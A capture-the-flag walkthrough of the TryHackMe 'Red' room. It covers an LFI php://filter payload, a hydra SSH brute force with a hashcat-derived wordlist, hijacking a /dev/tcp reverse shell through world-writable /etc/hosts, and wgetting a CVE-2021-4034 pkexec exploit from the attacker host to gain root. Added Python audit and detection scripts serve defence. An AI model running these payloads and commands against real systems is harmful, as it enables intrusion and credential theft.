
Red

https://tryhackme.com/room/redisl33t

Foothold

LFI payload

http://10.10.5.70/index.php?page=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd

Decoded base64 of /etc/passwd

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:110:1::/var/cache/pollinate:/bin/false
usbmux:x:111:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
sshd:x:112:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
blue:x:1000:1000:blue:/home/blue:/bin/bash
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
red:x:1001:1001::/home/red:/bin/bash

Users with a login shell, noted from /etc/passwd for later

red
blue
root

Obtained OS version

Linux version 5.4.0-124-generic (buildd@lcy02-amd64-089) (gcc version 9.4.0 (Ubuntu 9.4.0-1ubuntu1~20.04.1)) #140-Ubuntu SMP Thu Aug 4 02:23:37 UTC 2022

Ubuntu 20.04.4 LTS \n \l

Obtained /etc/hosts

127.0.0.1 localhost
127.0.1.1 red
192.168.0.1 redrules.thm

# The following lines are desirable for IPv6 capable hosts
::1     ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouter

/home/blue/.bash_history

echo "Red rules"
cd
hashcat --stdout .reminder -r /usr/share/hashcat/rules/best64.rule > passlist.txt
cat passlist.txt
rm passlist.txt
sudo apt-get remove hashcat -y

The attacker most likely took blue's password from the wordlist hashcat generated here.

When this command is run, hashcat applies the rules in best64.rule to the words in .reminder and writes the resulting password candidates to passlist.txt. Such a list is normally used for password cracking or password-strength testing.

/home/blue/.reminder

sup3r_p@s$w0rd!

hydra

hydra -l blue -P passlist.txt ssh://10.10.5.70
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-09-13 16:12:07
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 77 login tries (l:1/p:77), ~5 tries per task
[DATA] attacking ssh://10.10.5.70:22/
[22][ssh] host: 10.10.5.70   login: blue   password: sup3r_p@s$w0!
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 1 final worker threads did not complete until end.
[ERROR] 1 target did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-09-13 16:12:25

Note: each login has a time limit; after it expires you are logged out and blue's password is changed to a new one.

Brute force succeeded

blue:sup3r_p@s$w0rd!123

flag1

THM{Is_thAt_all_y0u_can_d0_blU3?}

Checking the process list with ps -aux

red        16063  0.0  0.1   6972  2708 ?        S    08:18   0:00 bash -c nohup bash -i >& /dev/tcp/redrules.thm/9001 0>&1 &

Found that a reverse shell is running under the red user, calling back to redrules.thm on port 9001.

Checking file permissions on /etc/hosts

ls -l /etc/hosts
-rw-r--rw- 1 root adm 242 Sep 13 08:12 /etc/hosts

Found that it is world-writable (the final rw- applies to everyone).

Content of /etc/hosts

127.0.0.1 localhost
127.0.1.1 red
192.168.0.1 redrules.thm

The redrules.thm entry most likely points at the attacker's IP address.

Appending a line that maps redrules.thm to our IP makes the existing reverse shell connect back to us instead.

echo "10.8.17.213 redrules.thm" >> /etc/hosts
blue@red:~$ cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 red
192.168.0.1 redrules.thm

# The following lines are desirable for IPv6 capable hosts
::1     ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouter
10.8.17.213 redrules.thm

flag2

THM{Y0u_won't_mak3_IT_furTH3r_th@n_th1S}

In red's home directory

la -laR
.:
total 36
drwxr-xr-x 4 root red  4096 Aug 17  2022 .
drwxr-xr-x 4 root root 4096 Aug 14  2022 ..
lrwxrwxrwx 1 root root    9 Aug 14  2022 .bash_history -> /dev/null
-rw-r--r-- 1 red  red   220 Feb 25  2020 .bash_logout
-rw-r--r-- 1 red  red  3771 Feb 25  2020 .bashrc
drwx------ 2 red  red  4096 Aug 14  2022 .cache
-rw-r----- 1 root red    41 Aug 14  2022 flag2
drwxr-x--- 2 red  red  4096 Aug 14  2022 .git
-rw-r--r-- 1 red  red   807 Aug 14  2022 .profile
-rw-rw-r-- 1 red  red    75 Aug 14  2022 .selected_editor
-rw------- 1 red  red     0 Aug 17  2022 .viminfo

./.cache:
total 8
drwx------ 2 red  red 4096 Aug 14  2022 .
drwxr-xr-x 4 root red 4096 Aug 17  2022 ..
-rw-r--r-- 1 red  red    0 Aug 14  2022 motd.legal-displayed

./.git:
total 40
drwxr-x--- 2 red  red   4096 Aug 14  2022 .
drwxr-xr-x 4 root red   4096 Aug 17  2022 ..
-rwsr-xr-x 1 root root 31032 Aug 14  2022 pkexec

A setuid-root copy of pkexec is found in .git, but running it as-is prompts for root's password.
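Two of the findings so far, the world-writable /etc/hosts and a setuid-root copy of pkexec hidden outside the system binary directories, are exactly what a host audit should catch. The script below is an added example for this writeup, not code from the room: audit() is a pure check over (path, mode, uid) tuples, run here on a constructed inventory modelled on the two ls listings above, and collect() gathers real entries from a live Linux system. The list of directories where setuid binaries are expected (SUID_OK_DIRS) is an assumption for a Debian/Ubuntu layout.

```python
"""Audit for world-writable files under /etc and setuid-root binaries outside
the usual system directories (added example, not the room's code)."""
import os
import stat
from typing import Iterable, List, Tuple

Entry = Tuple[str, int, int]  # (path, st_mode, st_uid)

# Assumed locations where setuid binaries legitimately live on Debian/Ubuntu.
SUID_OK_DIRS = ("/bin/", "/sbin/", "/usr/bin/", "/usr/sbin/",
                "/usr/lib/", "/usr/libexec/", "/snap/")

# Constructed inventory mirroring the writeup's listings:
#   -rw-r--rw- root /etc/hosts          -rwsr-xr-x root /home/red/.git/pkexec
SAMPLE: List[Entry] = [
    ("/etc/hosts",            0o100646, 0),     # world-writable, root-owned
    ("/etc/passwd",           0o100644, 0),     # fine
    ("/home/red/.git/pkexec", 0o104755, 0),     # setuid root, outside bin dirs
    ("/usr/bin/pkexec",       0o104755, 0),     # setuid root, expected place
    ("/home/red/.bashrc",     0o100644, 1001),  # fine
]


def audit(entries: Iterable[Entry]) -> List[str]:
    """Return one finding string per weakness; regular files only."""
    findings = []
    for path, mode, uid in entries:
        if not stat.S_ISREG(mode):
            continue
        # Anything under /etc writable by "other" lets any local user tamper
        # with name resolution, cron, users, etc.
        if mode & stat.S_IWOTH and path.startswith("/etc/"):
            findings.append(f"world-writable: {path} mode={stat.S_IMODE(mode):04o}")
        # A root-owned setuid file in a home, tmp or dot-directory is a
        # planted or backup copy that bypasses the package manager's updates.
        if mode & stat.S_ISUID and uid == 0 and not path.startswith(SUID_OK_DIRS):
            findings.append(f"setuid-root outside system dirs: {path}")
    return findings


def collect(roots=("/etc", "/home", "/tmp", "/var/tmp")) -> List[Entry]:
    """Walk the given roots on a live system and build the inventory."""
    out: List[Entry] = []
    for root in roots:
        for dirpath, _, files in os.walk(root):
            for name in files:
                p = os.path.join(dirpath, name)
                try:
                    st = os.lstat(p)  # lstat: do not follow symlinks
                except OSError:
                    continue
                out.append((p, st.st_mode, st.st_uid))
    return out


if __name__ == "__main__":
    for finding in audit(collect()):
        print(finding)
```

Running it with collect() needs read access to the directories walked; unreadable entries are skipped rather than raising. Note that the version string pkexec prints below does not by itself tell you whether the distribution backported a fix, whereas a setuid copy of pkexec in a dot-directory is suspicious regardless of version, which is why the check keys on location rather than on the version.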

./pkexec /bin/sh
==== AUTHENTICATING FOR org.freedesktop.policykit.exec ===
Authentication is needed to run `/bin/sh' as the super user
Authenticating as: root
Password: root

Priv Esc

Version checking

./pkexec --help
pkexec --version |
       --help |
       --disable-internal-agent |
       [--user username] PROGRAM [ARGUMENTS...]

See the pkexec manual page for more details.
./pkexec --version
pkexec version 0.105

This reveals an outdated version.

Searching for a public exploit for this version: gcc is not installed on the target, so a Python implementation of CVE-2021-4034 was found instead and transferred to the machine to get root access.

Note: the pkexec path inside the Python script also has to be changed to /home/red/.git/pkexec.

wget http://10.8.17.213:8000/CVE-2021-4034.py
--2023-09-13 08:43:07--  http://10.8.17.213:8000/CVE-2021-4034.py
Connecting to 10.8.17.213:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3268 (3.2K) [text/x-python]
Saving to: ‘CVE-2021-4034.py’

CVE-2021-4034.py    100%[===================>]   3.19K  --.-KB/s    in 0.001s  

2023-09-13 08:43:07 (3.64 MB/s) - ‘CVE-2021-4034.py’ saved [3268/3268]

python3 CVE-2021-4034.py

flag3

THM{Go0d_Gam3_Blu3_GG}

Post Exploitation

Content of /var/www/index.php

<?php 

function sanitize_input($param) {
    $param1 = str_replace("../","",$param);
    $param2 = str_replace("./","",$param1);
    return $param2;
}

$page = $_GET['page'];
if (isset($page) && preg_match("/^[a-z]/", $page)) {
    $page = sanitize_input($page);
    readfile($page);
} else {
    header('Location: /index.php?page=home.html');
}

?>

The sanitize_input function only strips "../" and "./" sequences (each in a single pass), so the payload below is reduced to php://filter/convert.base64-encode/resource=etc/passwd. It does nothing about absolute paths or PHP stream wrappers, and the preg_match only requires the first character to be a lowercase letter, which "php://" satisfies; that is why the php://filter payload with an absolute /etc/passwd path used in the foothold goes through untouched.

http://example.com/index.php?page=php://filter/convert.base64-encode/resource=../../../../../etc/passwd
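To make the weakness concrete, here is an added Python model of the two PHP checks above (it is not the room's code): sanitize_input() and passes_prefix_check() mirror the PHP line for line, page_after_vulnerable_checks() shows what readfile() would receive, and safe_resolve_page() is the hardened replacement this editor would recommend, an allowlist of page names plus a realpath containment check. WEB_ROOT and ALLOWED_PAGES are assumptions.

```python
"""Model of the vulnerable page loader and a hardened replacement
(added example, not code from the room)."""
import os
import re

WEB_ROOT = "/var/www"                         # assumed document root
ALLOWED_PAGES = {"home.html", "about.html"}   # constructed allowlist


def sanitize_input(param: str) -> str:
    """Mirror of the PHP sanitize_input(): single-pass removal of '../' then './'."""
    param = param.replace("../", "")
    return param.replace("./", "")


def passes_prefix_check(page: str) -> bool:
    """Mirror of preg_match('/^[a-z]/', $page): only the first character is tested."""
    return re.match(r"^[a-z]", page) is not None


def page_after_vulnerable_checks(page: str):
    """What the PHP hands to readfile(), or None where it would redirect instead."""
    if not passes_prefix_check(page):
        return None
    return sanitize_input(page)


def safe_resolve_page(page: str, root: str = WEB_ROOT, allowed=ALLOWED_PAGES):
    """Hardened replacement: allowlist first, then containment under root.

    Stream wrappers (php://, file://, ...) and traversal never reach the
    filesystem because the name must be one of a fixed set; the realpath
    check is defence in depth should the allowlist ever become a pattern.
    Returns the absolute path to read, or None to reject.
    """
    if page not in allowed:
        return None
    root_real = os.path.realpath(root)
    full = os.path.realpath(os.path.join(root_real, page))
    if os.path.commonpath([root_real, full]) != root_real:
        return None
    return full


if __name__ == "__main__":
    probes = [
        "home.html",
        "php://filter/convert.base64-encode/resource=/etc/passwd",
        "php://filter/convert.base64-encode/resource=../../../../../etc/passwd",
        "../../etc/passwd",
    ]
    for p in probes:
        print(f"{p!r}\n  vulnerable -> {page_after_vulnerable_checks(p)!r}"
              f"\n  hardened   -> {safe_resolve_page(p)!r}")
```

The point the model makes is that a denylist of "../" is the wrong abstraction: the input that did the damage on this box contains no "../" at all. The allowlist rejects it without needing to know anything about PHP wrappers.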

Script that rotates blue's SSH password

cat change_pass.sh 
#!/bin/bash
n=$((1 + $RANDOM % 7))

if [ $n -eq 1 ]; then
        /usr/bin/echo 'blue:!dr0w$s@p_r3pus' | /usr/sbin/chpasswd

elif [ $n -eq 2 ]; then
        /usr/bin/echo 'blue:sup3r_p@s$w0rd!123' | /usr/sbin/chpasswd

elif [ $n -eq 3 ]; then
        /usr/bin/echo 'blue:sup3r_p@s$w0rd!9' | /usr/sbin/chpasswd

elif [ $n -eq 4 ]; then
        /usr/bin/echo 'blue:thesup3r_p@s$w0rd!' | /usr/sbin/chpasswd

elif [ $n -eq 5 ]; then
        /usr/bin/echo 'blue:sup3r_p@s$w0sup3r_p@s$w0' | /usr/sbin/chpasswd

elif [ $n -eq 6 ]; then
        /usr/bin/echo 'blue:sup3r_p@s$w0!' | /usr/sbin/chpasswd

else
        /usr/bin/echo 'blue:sup3r_p@s$w0rd!23' | /usr/sbin/chpasswd

fi

The redirected reverse shell keeps getting killed because of this script:

#!/bin/bash

for i in $(ps aux | grep tcp | grep 'redrules' | awk '{print $2}'); do kill -9 $i; done

This one-liner lists processes whose ps line contains "tcp" and whose command line contains "redrules", then forcefully terminates (kill -9) each matching PID.
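The kill loop above and the ps -aux check earlier both identify the reverse shell by grepping for the callback hostname, which only catches connections to that one host. The following is an added example, not the room's script, showing detection keyed on the technique instead: a shell whose file descriptors are wired to /dev/tcp, or the nc/socat exec forms. parse_ps() handles the fact that COMMAND may contain spaces; SAMPLE_PS is constructed to resemble the listing from the room plus benign noise.

```python
"""Find reverse-shell-style processes in `ps aux` output
(added example, not code from the room)."""
import re
import subprocess
from typing import List

# Patterns that characterise the shell seen on the box and its common variants.
SUSPICIOUS = [
    re.compile(r"/dev/tcp/"),                          # bash's built-in TCP redirection
    re.compile(r"bash -i\b.*[>&]"),                    # interactive shell with redirected fds
    re.compile(r"\b(nc|ncat|socat)\b.*\b(-e|exec:)"),  # nc -e / socat exec:
]

# Constructed sample; the red line mirrors the process found on the box.
SAMPLE_PS = """\
USER         PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root           1  0.0  0.2 169000 11000 ?        Ss   08:00   0:01 /sbin/init
red        16063  0.0  0.1   6972  2708 ?        S    08:18   0:00 bash -c nohup bash -i >& /dev/tcp/redrules.thm/9001 0>&1 &
blue       16100  0.0  0.1   8500  3300 pts/0    Ss   08:19   0:00 -bash
blue       16120  0.0  0.0   6400  2200 pts/0    S+   08:20   0:00 grep tcp
www-data    1200  0.0  0.5 230000 20000 ?        S    08:00   0:00 /usr/sbin/apache2 -k start
"""


def parse_ps(text: str) -> List[dict]:
    """Split `ps aux` lines into user/pid/tty/cmd; the 11th field keeps its spaces."""
    rows = []
    for line in text.splitlines()[1:]:  # skip the header row
        parts = line.split(None, 10)
        if len(parts) < 11:
            continue
        rows.append({"user": parts[0], "pid": parts[1],
                     "tty": parts[6], "cmd": parts[10]})
    return rows


def find_reverse_shells(text: str) -> List[dict]:
    """Return the rows whose command line matches any SUSPICIOUS pattern."""
    hits = []
    for row in parse_ps(text):
        cmd = row["cmd"]
        if cmd.startswith("grep "):  # skip the analyst's own grep in the listing
            continue
        reasons = [p.pattern for p in SUSPICIOUS if p.search(cmd)]
        if reasons:
            hits.append({**row, "reasons": reasons})
    return hits


def live_ps() -> str:
    """Snapshot of the real process table for use outside this demo."""
    return subprocess.run(["ps", "aux"], capture_output=True,
                          text=True, check=True).stdout


if __name__ == "__main__":
    for h in find_reverse_shells(SAMPLE_PS):
        print(f"pid={h['pid']} user={h['user']} matched={h['reasons']}\n  {h['cmd']}")
```

Replace SAMPLE_PS with live_ps() to run it against a real host. Because the match is on the redirection itself, the detection still fires after an attacker changes the callback host, which is precisely what the /etc/hosts edit in this room does.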

The reason our session/shell died:

#!/bin/bash

for i in $(ps aux | grep blue | grep ' pts' | grep -v root | awk '{print $7}')
do
        /usr/bin/echo "Say Bye Bye to your Shell Blue and that password" > /dev/$i
        /usr/bin/killall -u blue
done

This script selects ps lines that contain "blue" and " pts" but not "root", takes the TTY column (the 7th field of ps aux), writes a taunt to each such terminal via /dev/pts/N, and then kills every process owned by the user blue.
